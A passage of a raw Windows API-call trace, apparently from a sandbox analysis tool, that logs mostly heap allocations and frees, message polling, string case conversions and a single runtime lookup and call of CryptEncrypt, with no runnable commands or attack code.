out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.406] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0260.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.406] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.407] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.407] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.408] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.412] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa830, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0260.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.415] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2170 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2190 | out: hHeap=0x25c0000) returned 1 [0260.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.415] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0260.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0260.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0260.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0260.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0260.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0260.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0260.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0260.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0260.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.421] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.421] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.421] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.421] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.421] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.421] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.422] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 